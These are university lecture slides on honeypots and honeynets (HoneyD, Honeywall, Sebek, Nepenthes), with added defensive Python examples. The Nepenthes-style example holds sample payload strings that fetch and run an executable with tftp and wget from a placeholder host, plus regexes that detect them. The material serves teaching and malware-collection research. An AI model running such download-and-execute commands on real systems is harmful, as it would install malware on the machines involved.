Intrusion Detection Systems
Matthijs Koot ([email protected])
Definitions, purpose
History
How honeypots work
  HoneyD
  Honeynet, Honeywall
  MWCollect: Nepenthes, HoneyTrap and HoneyBow
Outlook
  Limitations
  Recent topics
  Honeynet Research Alliance
Summary
Intrusion Detection Systems
Lecture #4: Honeypots
Matthijs Koot ([email protected])
Faculteit van Natuurwetenschappen, Wiskunde en Informatica, Universiteit van Amsterdam
2008-04-10 / SNE-IDS college ’07-’08
Outline
Definitions, purpose
History
How honeypots work
  HoneyD
  Honeynet, Honeywall
  MWCollect: Nepenthes, HoneyTrap and HoneyBow
Outlook
  Limitations
  Recent topics
  Honeynet Research Alliance
Definitions: ‘honeypot’.
Definition: A honeypot is a [sacrificial] security resource whose value lies in being probed, attacked or compromised.
Source: “Honeypots: Tracking Hackers", Lance Spitzner, 2002 (book)
Purpose of a honeypot.
The two main purposes of a honeypot:
- Research
  - Attract blackhats
  - Reveal blackhat tactics, techniques, tools (KYE)
  - Reveal motives/intentions (?)
  - Mostly universities, governments, ISPs
- Protection
  - Deter blackhats from real assets
  - Provide early warning
  - Mostly governments, large enterprises
- Purpose may determine honeypot functionality and architecture
Definitions: ‘honeynet’ and ‘honeywall’.
Definition: A honeynet is a network of [high-interaction] honeypots.
Definition: A honeywall is a layer-2 bridge that is placed in-line between a network and a honeynet, or between a network and a honeypot, to uni- or bidirectionally capture, control and analyze attacks.
Definition: A honeytoken is a honeypot which is not a computer.
Warning.
WARNING
In real life, “Honeynet"/“honeynet" and “Honeywall"/“honeywall" are sometimes used ambiguously to refer to both their concepts, as well as their prevalent implementation (think ‘DNS’ versus ‘bind’). This also explains any inconsistencies in (my) use of CaPiTaLiZaTiOn.
Psychology behind a honeypot.
In its protective form, a honeypot is designed on deception and intimidation (Fred Cohen, 2001):
- Concealment
- Camouflage
- False/planted information (honeytokens)
- Feints, lies, et cetera
  - E.g. false claims that a facility is being watched by law enforcement authorities
Functional requirements of a honeypot.
Functional requirements of a honeypot include:
- Data control (important!)
- Data capture
- Data collection (for large-scale honeynets)
- Data analysis
Taxonomy of honeypots.
Honeypots may be distinguished by their properties:
- Level of interactivity
- Data capture
- Containment (= ‘data control’)
- Distribution appearance
- Role in N-tier architecture
- Communication interface (API, NIC, ...)
Source: “Taxonomy of Honeypots", Seifert, Welch & Komisarczuk, 2006
Taxonomy of honeypots.
Classification tree (reconstructed from the figure): a honeypot is characterised by six properties, each taking one of the following values.
- Interaction level: High, Low
- Data capture: Events, Attacks, Intrusions, None
- Containment: Block, Defuse, Slowdown, None
- Distribution appearance: Stand-alone, Distributed
- Communication interface: Network IF, Non-network hardware IF, Software API
- Role in an N-tier architecture: Server, Client
Level of interactivity: low.
Figure (components shown: fake daemon, operating system, other local resources, hard disk; the figure marks which of these an attacker can reach at this level).
Reconstructed from source: “Honeypots", R. Baumann, C. Plattner (diploma thesis), 2002
Level of interactivity: mid.
Figure (components shown: fake daemon, operating system, other local resources, hard disk; the figure marks which of these an attacker can reach at this level).
Reconstructed from source: “Honeypots", R. Baumann, C. Plattner (diploma thesis), 2002
Level of interactivity: high.
Figure (components shown: fake daemon, operating system, other local resources, hard disk; the figure marks which of these an attacker can reach at this level).
Reconstructed from source: “Honeypots", R. Baumann, C. Plattner (diploma thesis), 2002
History of honeypots.
- 1990: real systems
  - Deploy unpatched systems in default config on an unprotected network (‘low-hanging fruit’)
  - Easy to deploy
  - High-interaction, high-risk
  - Nice reading: “Cuckoo’s Egg” by Clifford Stoll
- 1998: service/OS emulation
  - Deception Toolkit, CyberCop Sting, KFSensor, Specter
  - Easy to deploy
  - Low-interaction, low-risk
- 1999-current: virtual systems
  - HoneyD, Honeywall, Qdetect, Symantec Decoy Server (≈’03/’04)
  - Less easy to deploy
  - Mid/high-interaction, mid/high-risk
History of the Honeynet Project.
- 1999: Lance Spitzner (Sun) founds the Honeynet Project
- 1999-2001, GenI: PoC, L3+ (modified IP headers)
- 2001-2003, GenII: GenI + bridging (no TTL decrement, harder to detect)
- 2003: Release of the Eeyore Honeywall CD-ROM
- 2003-current, GenIII: GenII + blocking (Honeywall)
- 2005: Release of the Roo Honeywall CD-ROM
- future: ‘GenIV’ refers to next-gen analysis capabilities
Honeynet.org is home to the ‘KYE papers’ and has many refs to academic work! They are also known for the Scan of the Month (SotM) challenges, which alas appear to have stopped in 2005.
HoneyD.
HoneyD
- Run multiple virtual IP stacks in parallel (+ routing)
- Mid-interaction OS/service emulator
  - Emulates SMTP, FTP, HTTP, ...
  - Easily extendible through customizable scripts
- TCP/IP fingerprint spoofing through ‘personalities’
  - Impersonate Win32 on your favorite UNIX flavor (which should be MINIX), fooling nmap and xprobe
  - Fake WinSize, DF, ToS, ISN, ...
  - Fake packet loss, TTL, latency
- First released in 2002 by Niels Provos (the guy from outguess/stegdetect)
HoneyD.
HoneyD architecture (reconstructed from the figure): packets enter HoneyD through libpcap and leave through libnet; inside, a personality engine and a userland IP stack (ICMP, UDP, TCP) feed the service layer, which is realised either by an external program or by a proxy.
Reconstructed from source: http://md.hudora.de/presentations/2005-bh-honeypots-03-honeyd.pdf
HoneyD.
Applying the mid-interaction model to HoneyD: HoneyD services incoming requests on port tcp/21 by executing fake-ftpd.sh.
Figure (components shown: HoneyD listening on tcp/21, fake-ftpd.sh, operating system, other local resources).
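What a script like fake-ftpd.sh has to do is small: speak enough FTP to keep a scanner or bot talking, log everything it says, and never actually grant access. The following is an added example, not HoneyD's own fake-ftpd.sh: HoneyD hands each connection to a subsystem script over stdin/stdout, whereas here the session logic is a socket-free class (so it can be exercised directly) wrapped in a small TCP server for stand-alone use. The banner text, hostname, port 2121 and the three-failure cut-off are constructed for this example.

```python
"""A fake FTP daemon in the spirit of HoneyD's fake-ftpd.sh (added example).

Emulates just enough of the FTP control channel (RFC 959 reply codes) to
keep an attacker interacting, records every command and credential
attempt for later analysis, and never authenticates anyone.
"""
import socketserver
import time

BANNER = "220 ftp.example.invalid FTP server (Version wu-2.6.2) ready."  # constructed
MAX_FAILED_LOGINS = 3


class FakeFtpSession:
    """State machine for one control connection; one reply per command line."""

    def __init__(self, peer, clock=time.time):
        self.peer = peer              # (ip, port) of the remote side
        self.clock = clock
        self.user = None
        self.failed_logins = 0
        self.closed = False
        self.events = []              # (timestamp, peer, kind, detail)

    def _log(self, kind, detail):
        self.events.append((self.clock(), self.peer, kind, detail))

    def handle_line(self, line):
        line = line.rstrip("\r\n")[:512]   # bound what an attacker can make us log
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        self._log("cmd", line)
        if cmd == "USER":
            self.user = arg
            return "331 Password required for %s." % arg
        if cmd == "PASS":
            self._log("login", "%s:%s" % (self.user, arg))   # the valuable bit
            self.failed_logins += 1
            if self.failed_logins >= MAX_FAILED_LOGINS:
                self.closed = True
                return "421 Too many failed logins, closing control connection."
            return "530 Login incorrect."
        if cmd == "QUIT":
            self.closed = True
            return "221 Goodbye."
        if cmd == "SYST":
            return "215 UNIX Type: L8"
        if cmd in ("NOOP", "HELP"):
            return "200 Command okay."
        if not cmd:
            return "500 Invalid command."
        # Everything else needs a login that the decoy will never grant.
        return "530 Please login with USER and PASS."


class FakeFtpHandler(socketserver.StreamRequestHandler):
    def handle(self):
        session = FakeFtpSession(self.client_address)
        self.wfile.write((BANNER + "\r\n").encode())
        while not session.closed:
            raw = self.rfile.readline()
            if not raw:
                break
            reply = session.handle_line(raw.decode("latin-1", "replace"))
            self.wfile.write((reply + "\r\n").encode())
        # Hand the captured session to whatever collects honeypot data.
        for ts, peer, kind, detail in session.events:
            print("%.0f %s:%d %s %s" % (ts, peer[0], peer[1], kind, detail))


if __name__ == "__main__":
    socketserver.TCPServer.allow_reuse_address = True
    # 2121 stands in for tcp/21 so the example runs without root.
    with socketserver.TCPServer(("127.0.0.1", 2121), FakeFtpHandler) as srv:
        srv.serve_forever()
```

Keeping the protocol logic separate from the socket code is what makes such a decoy testable, and the 512-byte cap on logged lines is the kind of detail an emulator needs so that the attacker cannot turn the capture mechanism itself into a resource-exhaustion problem.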
Honeynet, Honeywall.
The basic idea of a Honeynet/Honeywall (figure, from a slide titled “Theory”): the Internet is connected through the Honeywall to the honeypots; the figure labels the two directions of traffic “No Restrictions” and “Connections Limited, Packet Scrubbed”.
Source: http://assert.uaf.edu/workshop06/slides/rdodge.pdf
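The “Connections Limited” label is the data-control half of the Honeywall: inbound traffic is let through untouched so that attackers can reach the decoys, but each honeypot is allowed only a bounded number of outbound connections per time window, so a compromised decoy cannot be turned against third parties at scale while the intruder still sees enough to keep acting. The following is an added example, not the Honeynet Project's rc.firewall script: a pure-Python policy engine that applies that rule to a stream of new-connection events. Honeypot addresses, per-protocol limits, window size and the sample events are constructed; the “Packet Scrubbed” part (done by an in-line IPS on the real Honeywall) is not modelled.

```python
"""Honeywall-style outbound connection limiting (added example)."""
from collections import defaultdict, deque

HONEYNET = {"10.0.0.5", "10.0.0.6"}          # constructed honeypot addresses
LIMITS = {"tcp": 15, "udp": 20, "icmp": 50}   # outbound connections per window
WINDOW = 3600                                 # seconds


class Honeywall:
    """Decides ACCEPT/DROP for each new connection crossing the bridge."""

    def __init__(self, honeynet=HONEYNET, limits=LIMITS, window=WINDOW):
        self.honeynet = honeynet
        self.limits = limits
        self.window = window
        self.recent = defaultdict(deque)   # (honeypot, proto) -> accepted timestamps
        self.log = []                      # every decision, for data capture

    def decide(self, ts, src, dst, proto):
        if src not in self.honeynet and dst in self.honeynet:
            verdict = "ACCEPT"             # inbound: let attackers reach the decoys
        elif src in self.honeynet:
            # Outbound (honeypot-to-honeypot is treated as outbound, conservatively).
            q = self.recent[(src, proto)]
            while q and ts - q[0] >= self.window:
                q.popleft()                # expire entries outside the sliding window
            if len(q) < self.limits.get(proto, 0):
                q.append(ts)
                verdict = "ACCEPT"
            else:
                verdict = "DROP"           # limit reached: contain, but keep logging
        else:
            verdict = "DROP"               # transit traffic has no business here
        self.log.append((ts, src, dst, proto, verdict))
        return verdict


def replay(events, honeywall=None):
    """Run (ts, src, dst, proto) events through a Honeywall; return verdict counts."""
    hw = honeywall or Honeywall()
    counts = defaultdict(int)
    for ev in events:
        counts[hw.decide(*ev)] += 1
    return dict(counts)


# Constructed scenario: one inbound probe, then the compromised honeypot tries
# 20 outbound TCP connections within a minute (a scanning worm, say).
SAMPLE_EVENTS = [(0, "198.51.100.7", "10.0.0.5", "tcp")] + [
    (10 + 3 * i, "10.0.0.5", "203.0.113.%d" % (i + 1), "tcp") for i in range(20)
]

if __name__ == "__main__":
    print(replay(SAMPLE_EVENTS))   # {'ACCEPT': 16, 'DROP': 5}
```

Note that dropped connections are still logged: from the data-capture point of view a blocked outbound attempt is exactly the event that tells you the decoy has been taken over.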
Sebek.
Sebek: spying on your intruder
- Honeynet.org: “Sebek is a tool designed for data capture, it attempts to capture most of the attackers activity on the honeypot, without the attacker knowing it (hopefully), then sends the recovered data to a central logging system."
- Linux kernel module that hooks sys_read()
- Covertly sends captured data to the honeywall (UDP)
- Recovers keystrokes, uploaded files, passwords, IRC chats, even if they’re encrypted by SSH, IPSec or SSL.
Sebek (figure; only the source caption survives in the text).
Source: “Know Your Enemy: Sebek - A kernel based data capture tool", Honeynet Project, 2003
Sebek in GenII honeynet.
(The slide reproduces the first page of the paper cited below; its text follows.)
Proceedings of the 2005 IEEE Workshop on Information Assurance and Security
T1B2 1555 United States Military Academy, West Point, NY, 15 – 17 June 2004
Towards a Third Generation Data Capture Architecture for Honeynets
Edward Balas and Camilo Viecco, Advanced Network Management Lab, Indiana University
Abstract— Honeynets have become an important tool for researchers and network operators. However, their effectiveness has been impeded by a lack of a standard unified honeynet data model which results from having multiple unrelated data sources, each with its own access method and format.
In this paper we propose a new data collection architecture that addresses the need for both rapid comprehension and detailed analysis by providing two data access methods: a relational model based fast path, and a canonical slow path. We also present a set of tools based on this architecture.
I. Introduction
A Honeynet is a network of high interaction honeypots [1]. High interaction honeypots are quite different from low interaction honeypots such as Honeyd [2] for they provide a full operating system and set of software for an intruder to interact with. This high level of interactivity is desired because it allows researchers the ability to observe the behavior of an intruder in a live system, and not a simulation. As a result, high interaction honeypots are well suited to capture new or unanticipated activity. However, high interaction honeypots collect a larger volume of detailed data from multiple data sources, making it difficult to manage honeynets and make sense of the collected data.
To help facilitate honeynet deployments and the sharing of information between researchers, The Honeynet Project standardized the GenII honeynet architecture [3]. This architecture includes a specification of Data Capture procedures whose purpose is to “log all of the attacker’s activity”. The GenII Data Capture procedures specify the collection of three types of data: firewall logs, network traffic and system activity. Figure 2 provides a schematic representation of a typical Gen II deployment. This architecture does not provide any guidance on how to store or access the captured data.
In the standardized architecture, firewall logs are used to provide a summary of the network activity. The “rc.firewall” script provided by the honeynet project allows this by using the Linux IPTables [4] connection tracking capabilities. We feel this logging is counter-intuitive because firewall logs are typically used for policy auditing and in this case they are being used to provide summary accounts of network activity. In addition, these summaries lack needed detail such as the duration and quantity of network activity.
Fig. 1. GenII Honeynet Data Capture.
Network traffic and Intrusion Detection System (IDS) events are captured using the Snort IDS system [5]. For Data Capture, two instances of Snort are executed, one to merely record the raw traffic, and the other to examine the network traffic looking for events that are indicative of misuse or intrusion.
System activity refers to monitoring activity from the perspective of each high interaction honeypot. This type of monitoring includes two types of data: Syslog and Sebek. Syslog data is provided by each honeypot’s operating system. Sebek is a tool developed by the Honeynet Project to monitor the behavior of the intruder even when the intruder uses session encryption [6]. Sebek operates as a hidden kernel module which covertly exports log data to the logging system.
The GenII honeynet architecture gathers very detailed
Source: “Towards a Third Generation Data Capture Architecture for Honeynets", Balas & Viecco, 2005
Hflowd data fusion (Perl script).
(The slide reproduces page 4 of the same paper; its text follows.)
To augment our understanding of the network activity and the hosts at either side of a communication, we added passive operating system fingerprinting capability, provided by the p0f [13] tool. P0f is also a pcap based monitor that provides an estimate of the operating system (OS) used by the host that initiates a TCP connection. This data is useful for two reasons. First, across flows it allows one to see if the apparent host OS is changing for a given IP source, providing an indication that the host might be behind a NAT. Second, OS identification can improve the accuracy of IDS events through the process of passive alert verification [14][15]. For instance, in a situation where an apache mod_ssl exploit [16] is launched against a non-linux host, the system could detect this discrepancy and treat the alert with a lower priority, similar to the approach taken by RNA [14]².
The addition of the Argus and p0f data to the Snort and packet capture data provides a more comprehensive representation of events than provided in the GenII design. Further, this new data can be organized around the concept of a network flow. However, additional data sources are needed to bridge the relational gap between the network flows and processes on a host.
To bridge this gap we enhanced Sebek [6] to monitor network activity from the host’s perspective. Sebek is a kernel based data capture tool designed to be installed on high interaction honeypots [1]. Balas modified Sebek to monitor socket, process and file activity [17]. These modifications provided three necessary capabilities.
First, Sebek was enhanced to monitor socket activity. Whenever a honeypot accepts or creates a network connection, Sebek records the IP level attributes as well as the corresponding host, process and inode. This allows us to relate a network flow to the specific open inode and file descriptor used by a process to service the connection. This data is integral to providing a composite view of the incident that transcends flow and host data. Once a network connection associated with an intrusion attempt is observed, we immediately know which inode and process the intrusion was tied to. Using this data we can quickly identify related information such as the keystrokes captured by Sebek.
Second, Sebek was enhanced to monitor process creation. This monitoring allows us to relate one process to another, rebuilding the process tree. This is important in intrusion analysis for it allows us to track the intrusion forward from the point of intrusion, identifying all processes created, and any other causally related system activity, such as outbound network connections [8]. The same capability can be used in reverse: if we see an outbound connection on a honeypot, we can back track to identify the point of intrusion.
Lastly, the ability to monitor the opening of files was added. Coupled with the process tree this allows us to identify all files accessed as part of an intrusion. This knowledge can in turn be used to prioritize data analysis efforts. As an example, presume that a specific intruder likes to place his/her files in a unique location in the file system. Once this location is identified, we can quickly search preexisting data for any prior indications of the same intruder’s presence. This capability can also be used to create a crude form of Honeytoken [18] where the act of accessing a certain file might be deemed an interesting event requiring further investigation.
B. Data Fusion
Hflow was developed to combine each of these data sources into a composite relational model. It continually consumes data from each source, fusing it based on identifiable relationships and it then loads this data into a database.
Hflow receives Argus flow, Snort IDS, p0f OS fingerprints and Sebek data. This data once combined is then inserted into a database.
Flow related data, such as Argus and Snort, are correlated based on corresponding tuples consisting of the IP protocol number, the source and destination IP addresses and if applicable port numbers which fall within the same
² p0f can only estimate the OS of the TCP initiator; in this example the OS of the host under attack is known either by manual introduction of the OS by the administrator, as with a honeypot, or through previous TCP connections initiated by the particular host.
Fig. 3. Data collection and fusion diagram (reconstructed from the figure): the honeynet Ethernet feeds a raw socket and libpcap in the kernel; on top of these run the daemons P0f (passive OS detector), Snort (intrusion detection system), Argus (flow monitor), the Sebek data collector and a traffic recorder; Hflowd fuses their output into the Hflow DB (relational data access), while the traffic recorder's pcap files provide raw data access.
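The fusion rule the paper describes is simple to state: flow-related records (Argus, Snort) are joined on the IP 5-tuple within a time window, p0f contributes the initiator's OS per flow, and the enhanced Sebek's socket records tie a flow to the honeypot process and inode that accepted it, after which the victim's known OS can be used for passive alert verification. The following is an added example, not the paper's Hflowd Perl script: a small Python model of that fusion, including the NAT hint (a source whose apparent OS changes between flows) and the mod_ssl-style downgrade. All records, addresses, the signature-to-OS table and the 5-second slack are constructed for this example.

```python
"""Hflow-style fusion of Argus flows, Snort alerts, p0f guesses and Sebek
socket records (added example, not the paper's Hflowd)."""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Key5:
    """IP 5-tuple: the correlation key for flow-related data."""
    proto: int
    src: str
    sport: int
    dst: str
    dport: int

@dataclass
class Flow:          # from Argus
    key: Key5
    start: float
    end: float

@dataclass
class Alert:         # from Snort
    key: Key5
    ts: float
    sid: int
    msg: str

@dataclass
class OsGuess:       # from p0f: OS of the TCP initiator
    src: str
    ts: float
    os: str

@dataclass
class SebekSocket:   # from the enhanced Sebek: which process accepted on host:port
    host: str
    proto: int
    lport: int
    pid: int
    inode: int

@dataclass
class Composite:
    flow: Flow
    alerts: List[Tuple[Alert, int]] = field(default_factory=list)  # (alert, priority)
    initiator_os: Optional[str] = None
    pid: Optional[int] = None
    inode: Optional[int] = None

# OS family a signature's exploit can succeed against (constructed; sid 1234
# stands in for the Apache mod_ssl rule the paper uses as its example).
SIG_TARGET_OS = {1234: "linux"}


def alert_priority(alert, known_os):
    """Passive alert verification: 1 = investigate, 3 = likely failed attempt."""
    target = SIG_TARGET_OS.get(alert.sid)
    victim = known_os.get(alert.key.dst)   # honeypot OS is known to the operator
    return 3 if target and victim and target != victim else 1


def fuse(flows, alerts, guesses, sockets, known_os, slack=5.0):
    """Attach alerts, the p0f guess and the Sebek process to each flow."""
    comps = {f.key: Composite(f) for f in flows}
    for a in alerts:
        c = comps.get(a.key)
        if c and c.flow.start - slack <= a.ts <= c.flow.end + slack:
            c.alerts.append((a, alert_priority(a, known_os)))
    by_sock = {(s.host, s.proto, s.lport): s for s in sockets}
    for c in comps.values():
        k, f = c.flow.key, c.flow
        for g in guesses:
            if g.src == k.src and f.start - slack <= g.ts <= f.end + slack:
                c.initiator_os = g.os
        s = by_sock.get((k.dst, k.proto, k.dport))
        if s:
            c.pid, c.inode = s.pid, s.inode
    return list(comps.values())


def nat_suspects(comps):
    """Sources whose apparent OS differs across flows: possibly behind a NAT."""
    seen = defaultdict(set)
    for c in comps:
        if c.initiator_os:
            seen[c.flow.key.src].add(c.initiator_os)
    return sorted(src for src, oses in seen.items() if len(oses) > 1)


# Constructed records: 198.51.100.7 fires the same exploit at two honeypots.
KNOWN_OS = {"10.0.0.5": "windows", "10.0.0.6": "linux"}
K1 = Key5(6, "198.51.100.7", 40001, "10.0.0.5", 443)
K2 = Key5(6, "198.51.100.7", 40002, "10.0.0.6", 443)
FLOWS = [Flow(K1, 100.0, 101.0), Flow(K2, 200.0, 201.0)]
ALERTS = [Alert(K1, 100.5, 1234, "mod_ssl overflow attempt"),
          Alert(K2, 200.4, 1234, "mod_ssl overflow attempt"),
          Alert(K2, 900.0, 1234, "mod_ssl overflow attempt")]   # outside the flow
GUESSES = [OsGuess("198.51.100.7", 100.0, "Linux 2.6"),
           OsGuess("198.51.100.7", 200.0, "Windows XP")]
SOCKETS = [SebekSocket("10.0.0.6", 6, 443, 2311, 48213)]


def demo():
    comps = fuse(FLOWS, ALERTS, GUESSES, SOCKETS, KNOWN_OS)
    summary = {c.flow.key.dst: ([p for _, p in c.alerts], c.initiator_os, c.pid)
               for c in comps}
    return summary, nat_suspects(comps)
```

Running demo() shows the two halves of the argument: the attempt against the Windows honeypot keeps its alert but at priority 3, the attempt against the Linux honeypot stays at priority 1 and is already tied to pid 2311, and the source is flagged because p0f saw two different operating systems behind the same address.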
MWCollect: Nepenthes, HoneyTrap and HoneyBow.
MWCollect
- MWCollect (sort of) is an alliance of malware researchers and software engineers
- ...and, less pretty, it is the dead parent process from which Nepenthes was forked
- Home to Nepenthes, HoneyTrap and HoneyBow
- State-of-the-art (scientific) research on malware
  - Reverse engineering polymorphic shellcodes
  - Call-flow graph (binary) analysis
  - Et cetera
Nepenthes.
Nepenthes
- Malware-collecting mid-interaction honeypot
- Emulates known vulnerabilities and captures the malware trying to exploit them
  - E.g. NetDDE, LSASS, DCOM, ASN1, MSSQL, UPNP, IIS vulns
- Modular arch: vuln-*, shellcode-*, download-*, submit-*
- Extensions are being developed for call-flow graphs and binary shellcode analysis
- First released in 2006 by Paul Baecher et al.
Nepenthes.
Nepenthes architecture (reconstructed from the figure): incoming connections on tcp/445, tcp/135, tcp/80, tcp/... reach the Nepenthes core, which dispatches them to vulnerability modules (vuln-lsass, vuln-dcom, vuln-asn1, vuln-wins, ...); supporting modules are module-portwatch, geolocation-hostip, geolocation-geoip, log-download, log-irc and dnsresolve-adns. A captured EXPLOIT is handed to shellcode-generic and shellemu-winnt, which recover the PAYLOAD; the MALWARE URL found in the payload is fetched by download-tftp, download-ftp, download-http or download-link; the resulting MALWARE is then passed on by submit-file, submit-xmlrpc or submit-norman.
Source: “The Nepenthes Platform: An Efficient Approach to Collect Malware", Baecher et al., 2006
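The last two stages of that pipeline are the ones a collector gets wrong most easily: the download-* stage must find where the sample lives in a decoded payload and must not follow links that point back at the sensor itself, and the submit-* stage must not store the same binary a thousand times. The following is an added example, not Nepenthes' own modules: it extracts tftp/ftp/http URLs and the "tftp -i HOST GET FILE" command form from constructed payload strings, filters them, and stores fetched samples keyed by SHA-256 so that repeated sightings of one binary are counted rather than duplicated. No network download is performed; fake_fetch returns constructed bytes.

```python
"""Nepenthes-style download-link and submit-file stages (added example)."""
import hashlib
import re
from collections import defaultdict
from urllib.parse import urlparse

# URLs the download-tftp/ftp/http modules would fetch, and the
# "tftp -i HOST GET FILE" command form bots embed in shell one-liners.
URL_RE = re.compile(r"\b(?:tftp|ftp|http)://[\w.\-]+(?::\d+)?/[^\s\"'<>;&|]*", re.I)
TFTP_CMD_RE = re.compile(r"\btftp\s+(?:-i\s+)?([\w.\-]+)\s+get\s+([^\s;&|]+)", re.I)


def extract_download_links(payload: str):
    """Return the distinct download locations found in a decoded payload."""
    found = [m.group(0) for m in URL_RE.finditer(payload)]
    found += ["tftp://%s/%s" % (host, name) for host, name in TFTP_CMD_RE.findall(payload)]
    seen, links = set(), []
    for link in found:
        if link not in seen:
            seen.add(link)
            links.append(link)
    return links


def is_fetchable(link: str, honeypot_ips) -> bool:
    """Reject links the download stage should not follow."""
    p = urlparse(link)
    if p.scheme.lower() not in ("tftp", "ftp", "http") or not p.hostname:
        return False
    if p.hostname in honeypot_ips:        # points back at the sensor itself
        return False
    return True


class SampleStore:
    """submit-file stage: one copy per distinct binary, every sighting recorded."""

    def __init__(self):
        self.samples = {}                   # sha256 -> bytes
        self.sightings = defaultdict(list)  # sha256 -> source URLs, in order seen

    def submit(self, data: bytes, source_url: str):
        digest = hashlib.sha256(data).hexdigest()
        is_new = digest not in self.samples
        if is_new:
            self.samples[digest] = data
        self.sightings[digest].append(source_url)
        return digest, is_new


# Constructed payload strings, as a shellcode-* module might hand them over.
SAMPLE_PAYLOADS = [
    "cmd /c tftp -i 203.0.113.5 GET ms.exe & start ms.exe",
    "cmd /c wget http://203.0.113.5:8080/dl/ms.exe -O x.exe & x.exe",
    "cmd /c tftp -i 10.0.0.5 GET ms.exe",       # would fetch from the honeypot itself
]
HONEYPOT_IPS = {"10.0.0.5"}                     # constructed sensor address


def fake_fetch(link):
    """Stand-in for the download-* modules: constructed bytes, no network."""
    return b"MZ-constructed-sample"             # the same binary from every location


def collect(payloads, fetch=fake_fetch, honeypot_ips=HONEYPOT_IPS):
    """Run the pipeline: links -> filter -> fetch -> submit; return the store."""
    store = SampleStore()
    for payload in payloads:
        for link in extract_download_links(payload):
            if is_fetchable(link, honeypot_ips):
                store.submit(fetch(link), link)
    return store


if __name__ == "__main__":
    s = collect(SAMPLE_PAYLOADS)
    for digest, urls in s.sightings.items():
        print(digest[:16], len(urls), urls)
```

Hashing before storing is what lets a sensor report "one new sample, seen from two locations" instead of flooding the analysts with copies, and the self-reference filter stops the collector from being pointed at its own address by a payload.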
HoneyTrap and HoneyBow.
HoneyTrap
- Low-interaction malware collection honeypot
- HoneyTrap binds to (all!) unbound TCP ports, and listens
- Does not emulate vulns or services, although the latter is possible through plug-ins
- Aimed at catching 0-days (unlike Nepenthes)
HoneyBow
- High-interaction malware collection honeypot
- Announced in Dec/2006 by the China Honeynet Project
- Modular arch: MwWatcher, MwFetcher, MwSubmitter
- Claimed it will interoperate with Nepenthes
Limitations.
Limitations/caveats in honeypot technology
- Complexity is the enemy of security, and honeynets are complex.
  - Bugs in emulators
  - Bugs in data capture/analysis/control tools
  - Privilege escalation / jailbreak
- Known attacks: NoSEBrEaK, (unofficial) Phrack #62/0x07 (Local Honeypot Identification).
- Decoy/false attacks (counter-counter, etc.).
- Blackhats exchange and evade IP ranges of known honeynets
  - Auto(re)configuration, higher volatility might help
Recent topics.
- Honeysnap
  - CLI tool for high-level analysis of captured data
  - honeysnap -c honeynet.cfg myfile.pcap
- Unified Data Analysis Framework (UDAF)
  - Library for data acquisition, filtering, fusion, reporting, et cetera (towards visual programming)
  - Let’s hope it’ll be interoperable with IDMEF / GOTEK
- Sandboxes: CWSandbox, Norman, Sandboxie
- SCADA honeynets
  - Cisco CIAG: scadahoneynet.sf.net
  - PLC emulation; MODBUS, DNP
- Client honeypots: honeyclient, Capture-HPC, HoneyC, SpyBye
- Honeystick, Google Hack Honeypot
Honeypot classification (figure; only the source caption survives in the text).
Source: “Taxonomy of Honeypots", Seifert, Welch & Komisarczuk, 2006
Honeynet Research Alliance.
Honeynet Research Alliance
- “The Honeynet Research Alliance is a trusted forum of other honeypot research organizations. [...] These organizations subscribe to the Alliance for the purpose of researching, developing and deploying honeypot related technologies and sharing the lessons learned."
Honeynet Research Alliance (map).
NL is still not represented. Why?
Summary
Topics that have been discussed
- Definition, purpose, taxonomy
- Tools: HoneyD, Honeywall, Sebek, Nepenthes
- Limitations, recent topics
Feedback!
Questions regarding this lecture?
Lab assignments (deadline = April 14th): http://os3.nl/2007-2008/courses/ids/practica_bij_10_april
These slides will be uploaded here: http://os3.nl/2007-2008/courses/ids/